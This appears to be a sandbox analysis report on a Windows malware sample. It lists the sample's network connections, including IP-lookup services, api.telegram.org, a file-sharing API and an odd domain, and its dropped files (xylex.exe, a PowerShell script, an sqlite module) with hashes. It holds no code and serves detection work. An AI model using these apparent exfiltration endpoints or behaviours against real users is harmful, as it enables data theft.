"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.24.1380787942\849734236" -childID 23 -isForBrowser -prefsHandle 6008 -prefMapHandle 10476 -prefsLen 31308 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb5f87da-546d-448d-aa0b-147b1fcec16d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 9848 21867a44e58 tab

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 34.117.118.44:443 www.myexternalip.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 172.67.205.179:443 mrbfederali.cam tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49866 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:49982 tcp
N/A 127.0.0.1:50002 tcp
N/A 127.0.0.1:50021 tcp
N/A 127.0.0.1:50041 tcp
N/A 127.0.0.1:50061 tcp
N/A 127.0.0.1:50081 tcp
N/A 127.0.0.1:50100 tcp
N/A 127.0.0.1:50120 tcp
N/A 127.0.0.1:50165 tcp
N/A 127.0.0.1:50197 tcp
N/A 127.0.0.1:50220 tcp
N/A 127.0.0.1:50240 tcp
N/A 127.0.0.1:50265 tcp
N/A 127.0.0.1:50285 tcp
N/A 127.0.0.1:50307 tcp
N/A 127.0.0.1:50327 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:50361 tcp
N/A 127.0.0.1:50381 tcp
N/A 127.0.0.1:50401 tcp
N/A 127.0.0.1:50421 tcp
N/A 127.0.0.1:50441 tcp
N/A 127.0.0.1:50461 tcp
N/A 127.0.0.1:50481 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50532 tcp
N/A 127.0.0.1:80 tcp
US 104.26.13.205:80 api.ipify.org tcp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 34.117.118.44:443 www.myexternalip.com tcp
US 104.26.13.205:80 api.ipify.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:50636 tcp
US 172.67.205.179:443 mrbfederali.cam tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50660 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50673 tcp
N/A 127.0.0.1:50692 tcp
N/A 127.0.0.1:50742 tcp
N/A 127.0.0.1:50766 tcp
N/A 127.0.0.1:50791 tcp
N/A 127.0.0.1:50812 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:50833 tcp
N/A 127.0.0.1:50852 tcp
N/A 127.0.0.1:50871 tcp
N/A 127.0.0.1:50890 tcp
N/A 127.0.0.1:50909 tcp
N/A 127.0.0.1:50928 tcp
N/A 127.0.0.1:50947 tcp
N/A 127.0.0.1:50955 tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
US 34.120.5.221:443 prod.pocket.prod.cloudops.mozgcp.net tcp
US 44.237.65.238:443 shavar.services.mozilla.com tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 push.services.mozilla.com udp
N/A 127.0.0.1:50961 tcp
US 216.239.32.21:80 virustotal.com tcp
US 216.239.32.21:443 virustotal.com tcp
US 8.8.8.8:53 21.32.239.216.in-addr.arpa udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.recaptcha.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
GB 142.250.180.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 www.recaptcha.net udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net tcp
US 8.8.8.8:53 recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 bit.ly udp
US 67.199.248.10:80 bit.ly tcp
US 67.199.248.10:80 bit.ly tcp
US 8.8.8.8:53 bit.ly udp
US 8.8.8.8:53 bit.ly udp
US 67.199.248.15:443 bitly.com tcp
US 8.8.8.8:53 bitly.com udp
US 67.199.248.15:443 bitly.com udp
US 8.8.8.8:53 docrdsfx76ssb.cloudfront.net udp
BE 92.123.50.203:443 cdn.optimizely.com tcp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 8.8.8.8:53 e5048.dsca.akamaiedge.net udp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 3.165.112.128:443 docrdsfx76ssb.cloudfront.net tcp
US 8.8.8.8:53 docrdsfx76ssb.cloudfront.net udp
US 8.8.8.8:53 docrdsfx76ssb.cloudfront.net udp
US 8.8.8.8:53 e5048.dsca.akamaiedge.net udp
US 8.8.8.8:53 15.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 10.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 128.112.165.3.in-addr.arpa udp
US 8.8.8.8:53 203.50.123.92.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 8.8.8.8:53 use.typekit.net udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 cdn.cookielaw.org udp
SE 184.31.15.40:443 use.typekit.net tcp
SE 184.31.15.40:443 use.typekit.net tcp
SE 184.31.15.40:443 use.typekit.net tcp
US 8.8.8.8:53 a1988.dscg1.akamai.net udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 8.8.8.8:53 a1988.dscg1.akamai.net udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 8.8.8.8:53 52.178.19.104.in-addr.arpa udp
US 8.8.8.8:53 40.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 ade.googlesyndication.com udp
US 8.8.8.8:53 ade.googlesyndication.com udp
US 8.8.8.8:53 98.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 jsdelivr.map.fastly.net udp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 151.101.1.229:443 jsdelivr.map.fastly.net udp
US 8.8.8.8:53 sp.bitly.com udp
US 34.120.78.44:443 sp.bitly.com tcp
US 34.120.78.44:443 sp.bitly.com tcp
US 8.8.8.8:53 sp.bitly.com udp
US 8.8.8.8:53 sp.bitly.com udp
US 34.120.78.44:443 sp.bitly.com udp
US 8.8.8.8:53 public.profitwell.com udp
US 8.8.8.8:53 js-eu1.hs-scripts.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 12389169.fls.doubleclick.net udp
US 8.8.8.8:53 229.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 44.78.120.34.in-addr.arpa udp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 dna8twue3dlxq.cloudfront.net udp
FR 18.155.129.23:443 dna8twue3dlxq.cloudfront.net tcp
US 172.65.208.22:443 js-eu1.hs-scripts.com tcp
US 8.8.8.8:53 2acdb9b66bb242618283aadb21ede6c1.pacloudflare.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
US 8.8.8.8:53 snap.licdn.com udp
US 8.8.8.8:53 connect.facebook.net udp
GB 216.58.204.70:443 12389169.fls.doubleclick.net tcp
US 8.8.8.8:53 static.hotjar.com udp
GB 142.250.187.206:443 analytics.google.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 2acdb9b66bb242618283aadb21ede6c1.pacloudflare.com udp
US 8.8.8.8:53 dna8twue3dlxq.cloudfront.net udp
US 8.8.8.8:53 cdn3.optimizely.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 a16488430484.cdn.optimizely.com udp
US 8.8.8.8:53 analytics.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 104.68.82.206:443 a16488430484.cdn.optimizely.com tcp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
GB 142.250.187.206:443 analytics.google.com udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 platform.twitter.map.fastly.net udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
GB 199.232.56.157:443 platform.twitter.map.fastly.net tcp
US 2.17.251.25:443 snap.licdn.com tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
US 3.165.113.121:443 static.hotjar.com tcp
GB 23.64.33.30:443 cdn3.optimizely.com tcp
US 8.8.8.8:53 js-eu1.hs-banner.com udp
US 8.8.8.8:53 js-eu1.hs-analytics.net udp
US 8.8.8.8:53 a1916.dscg2.akamai.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 platform.twitter.map.fastly.net udp
US 8.8.8.8:53 a1916.dscg2.akamai.net udp
US 172.65.238.60:443 js-eu1.hs-analytics.net tcp
US 172.65.202.201:443 js-eu1.hs-banner.com tcp
US 8.8.8.8:53 cdn3.optimizely.com udp
US 8.8.8.8:53 e4343.a.akamaiedge.net udp
US 8.8.8.8:53 static-cdn.hotjar.com udp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 e4343.a.akamaiedge.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 18ea70d2d9a945cfb97d818ba71817dc.pacloudflare.com udp
US 8.8.8.8:53 7c7b02d4bc3d48dd81a7c7738d4de1ab.pacloudflare.com udp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 analytics.twitter.com udp
BE 74.125.71.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 s.twitter.com udp
PL 93.184.221.165:443 t.co tcp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 px.ads.linkedin.com udp
US 8.8.8.8:53 script.hotjar.com udp
US 8.8.8.8:53 s.twitter.com udp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 track-eu1.hubspot.com udp
US 8.8.8.8:53 l-0005.l-msedge.net udp
US 8.8.8.8:53 script.hotjar.com udp
PL 93.184.221.165:443 t.co tcp
US 8.8.8.8:53 e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com udp
US 8.8.8.8:53 l-0005.l-msedge.net udp
US 8.8.8.8:53 script.hotjar.com udp
US 8.8.8.8:53 e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com udp
BE 74.125.71.156:443 stats.g.doubleclick.net udp
US 104.244.42.67:443 s.twitter.com tcp
US 13.107.42.14:443 l-0005.l-msedge.net tcp
FR 18.164.52.95:443 script.hotjar.com tcp
US 172.65.240.166:443 e5de3d23065c4748b155c28e6fa36f3e.pacloudflare.com tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 22.208.65.172.in-addr.arpa udp
US 8.8.8.8:53 23.129.155.18.in-addr.arpa udp
US 8.8.8.8:53 70.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.82.68.104.in-addr.arpa udp
US 8.8.8.8:53 157.56.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 121.113.165.3.in-addr.arpa udp
US 8.8.8.8:53 30.33.64.23.in-addr.arpa udp
US 8.8.8.8:53 25.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 60.238.65.172.in-addr.arpa udp
US 8.8.8.8:53 201.202.65.172.in-addr.arpa udp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 156.71.125.74.in-addr.arpa udp
US 8.8.8.8:53 165.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 67.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 166.240.65.172.in-addr.arpa udp
US 8.8.8.8:53 14.42.107.13.in-addr.arpa udp
US 8.8.8.8:53 95.52.164.18.in-addr.arpa udp
GB 163.70.151.35:443 star-mini.c10r.facebook.com tcp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 logx.optimizely.com udp
GB 163.70.151.35:443 star-mini.c10r.facebook.com udp
US 34.49.241.189:443 logx.optimizely.com tcp
US 8.8.8.8:53 logx.optimizely.com udp
US 34.49.241.189:443 logx.optimizely.com udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 189.241.49.34.in-addr.arpa udp
US 8.8.8.8:53 js.qualified.com udp
US 104.18.16.5:443 js.qualified.com tcp
US 8.8.8.8:53 js.qualified.com udp
US 8.8.8.8:53 js.qualified.com udp
US 8.8.8.8:53 ws.qualified.com udp
US 8.8.8.8:53 5.16.18.104.in-addr.arpa udp
US 8.8.8.8:53 lit-wildwood-9179.fathomless-lake-7710.herokuspace.com udp
US 54.163.161.109:443 lit-wildwood-9179.fathomless-lake-7710.herokuspace.com tcp
US 8.8.8.8:53 lit-wildwood-9179.fathomless-lake-7710.herokuspace.com udp
US 34.49.241.189:443 logx.optimizely.com udp
US 8.8.8.8:53 app.qualified.com udp
US 44.206.84.28:443 dry-bastion-1897.fathomless-lake-7710.herokuspace.com tcp
US 8.8.8.8:53 dry-bastion-1897.fathomless-lake-7710.herokuspace.com udp
US 8.8.8.8:53 assets.qualified.com udp
US 8.8.8.8:53 109.161.163.54.in-addr.arpa udp
US 8.8.8.8:53 28.84.206.44.in-addr.arpa udp
US 104.18.17.5:443 assets.qualified.com tcp
US 8.8.8.8:53 assets.qualified.com udp
US 104.18.17.5:443 assets.qualified.com tcp
US 104.18.17.5:443 assets.qualified.com tcp
US 104.18.17.5:443 assets.qualified.com tcp
US 104.18.17.5:443 assets.qualified.com tcp
US 104.18.17.5:443 assets.qualified.com tcp
US 104.18.17.5:443 assets.qualified.com tcp
US 8.8.8.8:53 assets.qualified.com udp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 sentry.io udp
US 8.8.8.8:53 sentry.io udp
US 8.8.8.8:53 qualified-production.s3.us-east-1.amazonaws.com udp
US 52.217.160.218:443 qualified-production.s3.us-east-1.amazonaws.com tcp
US 8.8.8.8:53 s3-r-w.us-east-1.amazonaws.com udp
US 35.186.247.156:443 sentry.io udp
US 8.8.8.8:53 5.17.18.104.in-addr.arpa udp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 218.160.217.52.in-addr.arpa udp
US 8.8.8.8:53 sp.bitly.com udp
US 8.8.8.8:53 d1ayxb9ooonjts.cloudfront.net udp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
FR 13.224.58.24:443 d1ayxb9ooonjts.cloudfront.net tcp
US 8.8.8.8:53 d1ayxb9ooonjts.cloudfront.net udp
US 8.8.8.8:53 d1ayxb9ooonjts.cloudfront.net udp
US 8.8.8.8:53 bat.bing.com udp
US 8.8.8.8:53 cdn.pdst.fm udp
US 204.79.197.237:443 bat.bing.com tcp
US 8.8.8.8:53 dual-a-0034.a-msedge.net udp
US 35.244.142.80:443 cdn.pdst.fm tcp
US 8.8.8.8:53 cdn.pdst.fm udp
US 8.8.8.8:53 dual-a-0034.a-msedge.net udp
US 8.8.8.8:53 cdn.pdst.fm udp
US 8.8.8.8:53 24.58.224.13.in-addr.arpa udp
US 35.244.142.80:443 cdn.pdst.fm udp
US 216.239.36.54:443 us-central1-adaptive-growth.cloudfunctions.net tcp
US 216.239.36.54:443 us-central1-adaptive-growth.cloudfunctions.net tcp
US 8.8.8.8:53 us-central1-adaptive-growth.cloudfunctions.net udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 54.36.239.216.in-addr.arpa udp
US 8.8.8.8:53 80.142.244.35.in-addr.arpa udp
US 216.239.36.54:443 us-central1-adaptive-growth.cloudfunctions.net udp
CA 148.113.163.172:443 usage.trackjs.com tcp
US 8.8.8.8:53 logx.optimizely.com udp
US 8.8.8.8:53 172.163.113.148.in-addr.arpa udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 79.121.18.2.in-addr.arpa udp
GB 142.250.200.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigl6ney.gvt1.com udp
GB 173.194.183.166:443 r1---sn-aigl6ney.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigl6ney.gvt1.com udp
GB 173.194.183.166:443 r1.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 166.183.194.173.in-addr.arpa udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 53.121.117.34.in-addr.arpa udp
US 8.8.8.8:53 rb.gy udp
US 34.238.201.52:80 rb.gy tcp
US 34.238.201.52:80 rb.gy tcp
US 8.8.8.8:53 rb.gy udp
US 8.8.8.8:53 free-url-shortener.rb.gy udp
FR 99.86.91.61:443 free-url-shortener.rb.gy tcp
US 8.8.8.8:53 free-url-shortener.rb.gy udp
US 8.8.8.8:53 free-url-shortener.rb.gy udp
US 8.8.8.8:53 use.typekit.net udp
SE 184.31.15.40:443 use.typekit.net tcp
US 8.8.8.8:53 a1988.dscg1.akamai.net udp
US 8.8.8.8:53 a1988.dscg1.akamai.net udp
SE 184.31.15.40:443 a1988.dscg1.akamai.net tcp
US 8.8.8.8:53 61.91.86.99.in-addr.arpa udp
US 8.8.8.8:53 p.typekit.net udp
SE 184.31.15.48:443 p.typekit.net tcp
SE 184.31.15.48:443 p.typekit.net tcp
US 8.8.8.8:53 a1874.dscg1.akamai.net udp
US 8.8.8.8:53 a1874.dscg1.akamai.net udp
US 8.8.8.8:53 snap.licdn.com udp
US 8.8.8.8:53 a1916.dscg2.akamai.net udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 dashboard-cdn.rebrandly.com udp
FR 18.164.52.81:443 dashboard-cdn.rebrandly.com tcp
FR 18.164.52.81:443 dashboard-cdn.rebrandly.com tcp
FR 18.164.52.81:443 dashboard-cdn.rebrandly.com tcp
FR 18.164.52.81:443 dashboard-cdn.rebrandly.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 48.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 dashboard-cdn.rebrandly.com udp
US 2.17.251.40:443 a1916.dscg2.akamai.net tcp
US 2.17.251.40:443 a1916.dscg2.akamai.net tcp
US 2.17.251.40:443 a1916.dscg2.akamai.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 81.52.164.18.in-addr.arpa udp
US 8.8.8.8:53 40.251.17.2.in-addr.arpa udp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
BE 74.125.71.156:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 px.ads.linkedin.com udp
US 13.107.42.14:443 px.ads.linkedin.com tcp
US 8.8.8.8:53 l-0005.l-msedge.net udp
BE 74.125.71.156:443 stats.g.doubleclick.net udp
GB 163.70.151.35:443 star-mini.c10r.facebook.com tcp
GB 163.70.151.35:443 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 google.com udp
GB 142.250.178.14:443 google.com tcp
GB 142.250.178.14:443 google.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
GB 142.250.178.14:443 google.com tcp
GB 142.250.178.14:443 google.com tcp
GB 142.250.178.14:443 google.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 free-url-shortener.rb.gy udp
US 8.8.8.8:53 rb.gy udp
US 44.195.192.104:443 rb.gy tcp
US 8.8.8.8:53 rb.gy udp
US 8.8.8.8:53 rb.gy udp
US 8.8.8.8:53 104.192.195.44.in-addr.arpa udp
GB 142.250.180.3:443 www.recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 www.virustotal.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.187.196:443 www.google.com udp

Files

memory/5088-0-0x00007FF8DE4D3000-0x00007FF8DE4D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wk2mh1yy.lmd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5088-10-0x00007FF8DE4D0000-0x00007FF8DEF92000-memory.dmp

memory/5088-9-0x00000201D26D0000-0x00000201D26F2000-memory.dmp

memory/5088-11-0x00007FF8DE4D0000-0x00007FF8DEF92000-memory.dmp

memory/5088-12-0x00007FF8DE4D0000-0x00007FF8DEF92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

MD5 8eacf3f9be7e3735352c4020fc4e05e9
SHA1 0bb6c048d9e683e152de21f7d368a4c151095504
SHA256 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
SHA512 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

memory/5088-25-0x00007FF8DE4D0000-0x00007FF8DEF92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/4124-108-0x000001FFDEC20000-0x000001FFDEC66000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.cmdline

MD5 9feca124b49851abb6eda9c837d5eef7
